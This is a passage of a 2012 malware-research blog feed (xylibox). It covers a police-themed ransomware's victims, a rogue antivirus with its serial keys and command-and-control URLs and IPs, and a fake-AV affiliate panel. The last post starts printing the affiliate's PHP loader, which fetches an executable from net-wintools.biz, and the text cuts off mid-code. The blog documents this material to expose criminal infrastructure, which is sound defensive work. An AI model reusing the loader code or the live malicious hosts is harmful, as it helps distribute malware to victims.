src="http://2.bp.blogspot.com/-dInLquA9Qws/T1vHBb1kVrI/AAAAAAAAFf0/HLxfs3Xaqxk/s400/victim15.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-n_S6mND_LHE/T1vHCP4QxJI/AAAAAAAAFf8/DZ6SyTlUsnY/s1600/victim16.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-n_S6mND_LHE/T1vHCP4QxJI/AAAAAAAAFf8/DZ6SyTlUsnY/s400/victim16.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-dz8ZOVVKUx4/T1vHCj7RO4I/AAAAAAAAFgE/qFqmjP4gSU0/s1600/victim18.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://2.bp.blogspot.com/-dz8ZOVVKUx4/T1vHCj7RO4I/AAAAAAAAFgE/qFqmjP4gSU0/s400/victim18.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/--5epUuZsRKU/T1vHDSgDz7I/AAAAAAAAFgM/55SC--737Cs/s1600/victim19.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://4.bp.blogspot.com/--5epUuZsRKU/T1vHDSgDz7I/AAAAAAAAFgM/55SC--737Cs/s400/victim19.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-qrLidUy4DEs/T1vHEBeUw5I/AAAAAAAAFgU/G4KPM-WRqZ8/s1600/victim2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-qrLidUy4DEs/T1vHEBeUw5I/AAAAAAAAFgU/G4KPM-WRqZ8/s400/victim2.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-1PEIRpINoqQ/T1vHEvN24MI/AAAAAAAAFgc/YDNWtHJd5h8/s1600/victim20.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://4.bp.blogspot.com/-1PEIRpINoqQ/T1vHEvN24MI/AAAAAAAAFgc/YDNWtHJd5h8/s400/victim20.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ghOgaLVS6zY/T1vHFWhYsfI/AAAAAAAAFgk/E65_YYEwd_k/s1600/victim21.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://2.bp.blogspot.com/-ghOgaLVS6zY/T1vHFWhYsfI/AAAAAAAAFgk/E65_YYEwd_k/s400/victim21.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-h60k8VZEe8Q/T1vHGMtLmaI/AAAAAAAAFgw/eP3X6wr7auA/s1600/victim22.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://2.bp.blogspot.com/-h60k8VZEe8Q/T1vHGMtLmaI/AAAAAAAAFgw/eP3X6wr7auA/s400/victim22.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-3xRhYZbMZOM/T1vHHujt6zI/AAAAAAAAFg0/pk-BgacOGHA/s1600/victim3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://1.bp.blogspot.com/-3xRhYZbMZOM/T1vHHujt6zI/AAAAAAAAFg0/pk-BgacOGHA/s400/victim3.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-xhePRGxUztA/T1vHIanQ4eI/AAAAAAAAFg8/uwIskqsz1I4/s1600/victim30.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://4.bp.blogspot.com/-xhePRGxUztA/T1vHIanQ4eI/AAAAAAAAFg8/uwIskqsz1I4/s400/victim30.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-aLq-AST4lR4/T1vHJF5dRII/AAAAAAAAFhE/EmZS1cdfgKE/s1600/victim4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-aLq-AST4lR4/T1vHJF5dRII/AAAAAAAAFhE/EmZS1cdfgKE/s400/victim4.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-DWO6ausbvzc/T1vHJiaG2xI/AAAAAAAAFhM/bCV-rFCW3TU/s1600/victim5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://1.bp.blogspot.com/-DWO6ausbvzc/T1vHJiaG2xI/AAAAAAAAFhM/bCV-rFCW3TU/s400/victim5.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-lXRDWKJsCkg/T1vHKXpCPqI/AAAAAAAAFhY/D_zg2BnmkUA/s1600/victim6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-lXRDWKJsCkg/T1vHKXpCPqI/AAAAAAAAFhY/D_zg2BnmkUA/s400/victim6.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-8E_oPyI7DCE/T1vHLCymHlI/AAAAAAAAFhc/D2T3M-zNgok/s1600/victim7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://1.bp.blogspot.com/-8E_oPyI7DCE/T1vHLCymHlI/AAAAAAAAFhc/D2T3M-zNgok/s400/victim7.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-KXhUPPuEIow/T1vHMICemyI/AAAAAAAAFhk/sTq12RO3B44/s1600/victim8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://3.bp.blogspot.com/-KXhUPPuEIow/T1vHMICemyI/AAAAAAAAFhk/sTq12RO3B44/s400/victim8.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Mr6e8QizjM0/T1vHM72LTcI/AAAAAAAAFhw/tkJ9T4tGt34/s1600/victim9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://2.bp.blogspot.com/-Mr6e8QizjM0/T1vHM72LTcI/AAAAAAAAFhw/tkJ9T4tGt34/s400/victim9.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;PSC not yet debited: (700€) &lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-nJWsfjJ0nZo/T1vHnVzwgWI/AAAAAAAAFh4/JWrZnOnaOwE/s1600/victim17_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="357" src="http://4.bp.blogspot.com/-nJWsfjJ0nZo/T1vHnVzwgWI/AAAAAAAAFh4/JWrZnOnaOwE/s400/victim17_OK.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-EPyDy9uOdR8/T1vHoOFo2AI/AAAAAAAAFh8/CHe-sYKV8TE/s1600/victim23_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="358" src="http://3.bp.blogspot.com/-EPyDy9uOdR8/T1vHoOFo2AI/AAAAAAAAFh8/CHe-sYKV8TE/s400/victim23_OK.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-N1AVc1FNzUQ/T1vHoix3N5I/AAAAAAAAFiE/9I9TUvIzqDI/s1600/victim24_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="358" src="http://1.bp.blogspot.com/-N1AVc1FNzUQ/T1vHoix3N5I/AAAAAAAAFiE/9I9TUvIzqDI/s400/victim24_OK.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-5nSGxvo-qbA/T1vHpOMZi_I/AAAAAAAAFiM/2TWi2Bvs4I0/s1600/victim25_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="358" src="http://2.bp.blogspot.com/-5nSGxvo-qbA/T1vHpOMZi_I/AAAAAAAAFiM/2TWi2Bvs4I0/s400/victim25_OK.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-9QNs3uPIDaI/T1vHqDTrLqI/AAAAAAAAFiU/WGLTAoABMpc/s1600/victim26_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://3.bp.blogspot.com/-9QNs3uPIDaI/T1vHqDTrLqI/AAAAAAAAFiU/WGLTAoABMpc/s400/victim26_OK.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-b00NKZHjrZc/T1vHqxgL0_I/AAAAAAAAFic/zIJQ_E4dKrE/s1600/victim27_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="357" src="http://3.bp.blogspot.com/-b00NKZHjrZc/T1vHqxgL0_I/AAAAAAAAFic/zIJQ_E4dKrE/s400/victim27_OK.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-sFWU_s8lt98/T1vHsCj_8lI/AAAAAAAAFiw/jN8YA-Ur3iw/s1600/victim29_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://3.bp.blogspot.com/-sFWU_s8lt98/T1vHsCj_8lI/AAAAAAAAFiw/jN8YA-Ur3iw/s400/victim29_OK.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-YGDSi3Y8P7o/T1vjmFoFiGI/AAAAAAAAFlw/iI5RTXHiBU8/s1600/Victime31_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="358" src="http://1.bp.blogspot.com/-YGDSi3Y8P7o/T1vjmFoFiGI/AAAAAAAAFlw/iI5RTXHiBU8/s400/Victime31_OK.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-khLAcJ3gRUU/T1xuuPtW0JI/AAAAAAAAFnY/GjMZ807S-nQ/s1600/11-03-2012+10-20-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://1.bp.blogspot.com/-khLAcJ3gRUU/T1xuuPtW0JI/AAAAAAAAFnY/GjMZ807S-nQ/s400/11-03-2012+10-20-54.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Look's like they use bets sites for money laundering.&lt;br /&gt;I've sent an email to Paysafecard concerning all these PIN codes, and to some French guys who do investigation in computer fraud.&lt;br /&gt;Have fun, stay safe.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-1mHIcZUdYMs/T1vhk3bfbNI/AAAAAAAAFlg/dA6yv9BY0wA/s1600/fma.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="225" src="http://3.bp.blogspot.com/-1mHIcZUdYMs/T1vhk3bfbNI/AAAAAAAAFlg/dA6yv9BY0wA/s400/fma.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-6583239920331226513?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/gema-fakepolicealert.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-EDl_-_DpbnA/T1vbLhUCJ4I/AAAAAAAAFlY/Z1ZGOvKB2Wc/s72-c/10-03-2012+23-51-40.png" height="72" width="72" /><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-4763282444690639538</guid><pubDate>Fri, 09 Mar 2012 16:44:00 +0000</pubDate><atom:updated>2012-03-09T17:58:12.321+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Best Virus Protection</category><category domain="http://www.blogger.com/atom/ns#">fakeav</category><title>Best Virus Protection</title><description>&lt;img border="0" src="http://3.bp.blogspot.com/--SgbfniHQE8/T1ouke-MEiI/AAAAAAAAFeo/QhsOzHL54aY/s1600/icon.PNG" /&gt;&lt;br /&gt;&lt;br /&gt;According to &lt;a href="http://siri-urz.blogspot.com/2012/03/best-virus-protection.html"&gt;S!Ri&lt;/a&gt; (and thanks for the sample)&lt;br /&gt;&lt;b&gt;Best Virus Protection&lt;/b&gt; is a fake security software (rogue). It replaces: &lt;b&gt;Antimalware PC Safety&lt;/b&gt;, &lt;b&gt;Strong Malware Defender&lt;/b&gt;, &lt;b&gt;Smart Anti-Malware Protection&lt;/b&gt;, &lt;b&gt;Antivirus Smart Protection&lt;/b&gt;, &lt;b&gt;Malware Protection Center&lt;/b&gt;, &lt;b&gt;Internet Security Guard&lt;/b&gt;, &lt;b&gt;Home Security Solutions&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-rm3o93_RI48/T1ouoRlsYLI/AAAAAAAAFew/1hxb_rFCyZg/s1600/Best.Virus.Protection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="288" src="http://3.bp.blogspot.com/-rm3o93_RI48/T1ouoRlsYLI/AAAAAAAAFew/1hxb_rFCyZg/s400/Best.Virus.Protection.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Best Virus Protection&lt;/span&gt; displays a lot of disturbing warning messages pushing users to purchase a license.&lt;br /&gt;To register (and help removal), enter this serial code: &lt;b style="color: red;"&gt;OS7L-GMRI-A2EH-TWUJ&lt;/b&gt; or &lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;U2FD-S2LA-H4KA-UEPB &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-foLxx_jtzgU/T1o2mLTm_3I/AAAAAAAAFfA/F7nrMBgxN_U/s1600/dumping.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://2.bp.blogspot.com/-foLxx_jtzgU/T1o2mLTm_3I/AAAAAAAAFfA/F7nrMBgxN_U/s400/dumping.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-cD0vdfnlDbs/T1ox4FXKUKI/AAAAAAAAFe4/Jn9FfE3KuQQ/s1600/SN.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="70" src="http://4.bp.blogspot.com/-cD0vdfnlDbs/T1ox4FXKUKI/AAAAAAAAFe4/Jn9FfE3KuQQ/s400/SN.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The following urls were found:&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;• dns: 1 » ip: 74.82.198.254 - adresse: WWW5.BESTVIRUS-PROTECTION.COM&lt;br /&gt;http://www5.bestvirus-protection.com/?uid=7&amp;amp;mid=54d478139f9a9764baead4fbf8f84bd7&amp;amp;StrWinOS=wvXP&amp;amp;bid=b_Unknown&amp;amp;sid=11110&amp;amp;ls=1&amp;amp;errors=21&amp;amp;nid=0&amp;amp;abbr=BVP&amp;amp;pid=3&lt;br /&gt;&lt;br /&gt;• dns: 1 » ip: 74.82.198.251 - adresse: SECURE1.SMARTEXB-HOLDER.COM&lt;br /&gt;http://secure1.smartexb-holder.com&lt;br /&gt;&lt;br /&gt;• dns: 1 » ip: 74.82.198.254 - adresse: SECURE2.SAVEVVZARMY.COM&lt;br /&gt;http://secure2.savevvzarmy.com&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-4763282444690639538?l=www.xylibox.com' alt='' /&gt;&lt;/div&gt;</description><link>http://www.xylibox.com/2012/03/best-virus-protection.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/--SgbfniHQE8/T1ouke-MEiI/AAAAAAAAFeo/QhsOzHL54aY/s72-c/icon.PNG" height="72" width="72" /><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-417434944384553328</guid><pubDate>Fri, 09 Mar 2012 14:34:00 +0000</pubDate><atom:updated>2012-03-09T15:36:22.981+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Antivirus Protection</category><category domain="http://www.blogger.com/atom/ns#">Zaxar</category><category domain="http://www.blogger.com/atom/ns#">fakeav</category><category domain="http://www.blogger.com/atom/ns#">Affiliate</category><title>FakeAV Affiliate who distribute Zaxar Family</title><description>Advert found in Blackhole&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-JJTTE0uEd0s/T1foirdOIxI/AAAAAAAAFcY/e41VQWvnsMw/s1600/bhadvert.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="77" src="http://3.bp.blogspot.com/-JJTTE0uEd0s/T1foirdOIxI/AAAAAAAAFcY/e41VQWvnsMw/s400/bhadvert.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;First contact the 24 Feb&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-4o4Snmm5d70/T1fpQqU7NPI/AAAAAAAAFcw/eph6OAlF4hM/s1600/serge.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="288" src="http://1.bp.blogspot.com/-4o4Snmm5d70/T1fpQqU7NPI/AAAAAAAAFcw/eph6OAlF4hM/s400/serge.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Then recontact the 25, 6 and more seriously about business the 7 Mar:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-iCQ0GEeUfBY/T1fopTW05FI/AAAAAAAAFcg/iIlPIz_IT1U/s1600/07-03-2012+19-26-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="391" src="http://4.bp.blogspot.com/-iCQ0GEeUfBY/T1fopTW05FI/AAAAAAAAFcg/iIlPIz_IT1U/s400/07-03-2012+19-26-58.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-U4Zvs8d0EVo/T1oJrghnScI/AAAAAAAAFeA/TSo9Ij8SWWQ/s1600/07-03-2012+19-27-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="391" src="http://3.bp.blogspot.com/-U4Zvs8d0EVo/T1oJrghnScI/AAAAAAAAFeA/TSo9Ij8SWWQ/s400/07-03-2012+19-27-24.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;9 Mar, loader operational.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-wzDons3zn6I/T1n_liWCuRI/AAAAAAAAFdw/wA75EvgzeuA/s1600/loader.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="391" src="http://3.bp.blogspot.com/-wzDons3zn6I/T1n_liWCuRI/AAAAAAAAFdw/wA75EvgzeuA/s400/loader.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;"Marketing compagny" no name... no logo... look's like a private affiliate.&lt;br /&gt;&lt;div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;• dns: » ip: 188.72.248.141 - adresse: NET-WINTOOLS.BIZ&lt;/div&gt;&lt;br /&gt;Login:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Y1AeL3_D6uA/T1ffhz9D02I/AAAAAAAAFbY/Gd9ATjRCJoY/s1600/Login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="248" src="http://3.bp.blogspot.com/-Y1AeL3_D6uA/T1ffhz9D02I/AAAAAAAAFbY/Gd9ATjRCJoY/s400/Login.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;News:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-l9DQzz0z17o/T1fmFhzXFFI/AAAAAAAAFbo/yAcnbJqZ5Qg/s1600/news.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-l9DQzz0z17o/T1fmFhzXFFI/AAAAAAAAFbo/yAcnbJqZ5Qg/s400/news.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-1nKPq_t6zGE/T1oTBHY18qI/AAAAAAAAFeY/EQCSa2dc8OE/s1600/newspage2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-1nKPq_t6zGE/T1oTBHY18qI/AAAAAAAAFeY/EQCSa2dc8OE/s400/newspage2.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Statistics:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-iVfVFdzHAEU/T1oD6qNN8UI/AAAAAAAAFd4/lTALFNlhzPY/s1600/stats.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-iVfVFdzHAEU/T1oD6qNN8UI/AAAAAAAAFd4/lTALFNlhzPY/s400/stats.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Promo:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-CQGpoIHXG-0/T1fmOjuwL3I/AAAAAAAAFbw/xfCUrfJcWJI/s1600/promo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-CQGpoIHXG-0/T1fmOjuwL3I/AAAAAAAAFbw/xfCUrfJcWJI/s400/promo.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Statistics by promo:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-So_ON4mjI9Y/T1fmX6kCO1I/AAAAAAAAFb4/_m1LltWuLSs/s1600/stats.by.promo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://4.bp.blogspot.com/-So_ON4mjI9Y/T1fmX6kCO1I/AAAAAAAAFb4/_m1LltWuLSs/s400/stats.by.promo.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Payement:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-79crnBpDxRE/T1fmjQVM6AI/AAAAAAAAFcA/KKunepCPLcg/s1600/payement.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://3.bp.blogspot.com/-79crnBpDxRE/T1fmjQVM6AI/AAAAAAAAFcA/KKunepCPLcg/s400/payement.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Profile:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-8x2IInlnuAY/T1fm0DW_nHI/AAAAAAAAFcI/c4Z6fm4lJQ0/s1600/profile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-8x2IInlnuAY/T1fm0DW_nHI/AAAAAAAAFcI/c4Z6fm4lJQ0/s400/profile.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;FAQ:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-oaF29Fz5bkg/T1fm7dz4IsI/AAAAAAAAFcQ/MAdpZt0fpHI/s1600/faq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://2.bp.blogspot.com/-oaF29Fz5bkg/T1fm7dz4IsI/AAAAAAAAFcQ/MAdpZt0fpHI/s400/faq.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;load1.txt:&lt;br /&gt;&lt;div class="php" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"&gt;&lt;span style="color: black; font-weight: bold;"&gt;&amp;lt;?php&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #666666; font-style: italic;"&gt;/*&lt;br /&gt;&amp;nbsp;* Получает ехе и записывает в файл &lt;br /&gt;&amp;nbsp;* &lt;br /&gt;&amp;nbsp;*/&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$fileName&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;span style="color: blue;"&gt;"scanner.1"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$afid&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;span style="color: blue;"&gt;"you_afid"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt; &lt;span style="color: #666666; font-style: italic;"&gt;// 1&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$urlActualDomain&lt;/span&gt; &lt;span style="color: #339933;"&gt;=&lt;/span&gt; &lt;span style="color: blue;"&gt;"http://net-wintools.biz/promo/domain/?category=1&amp;amp;api_key=[you_api_key]"&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #000088;"&gt;$actual_domain&lt;/span&gt;&lt;span style="color: #339933;"&gt;=&lt;/span&gt;&lt;a href="http://www.php.net/file_get_contents" style="color: #000060;"&gt;&lt;span style="color: #990000;"&gt;file_get_contents&lt;/span&gt;&lt;/a&gt;&lt;span style="color: #009900;"&gt;(&lt;/span&gt;&lt;span style="color: #000088;"&gt;$urlActualDomain&lt;/span&gt;&lt;span style="color: #009900;"&gt;)&lt;/span&gt;&lt;span style="color: #339933;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: 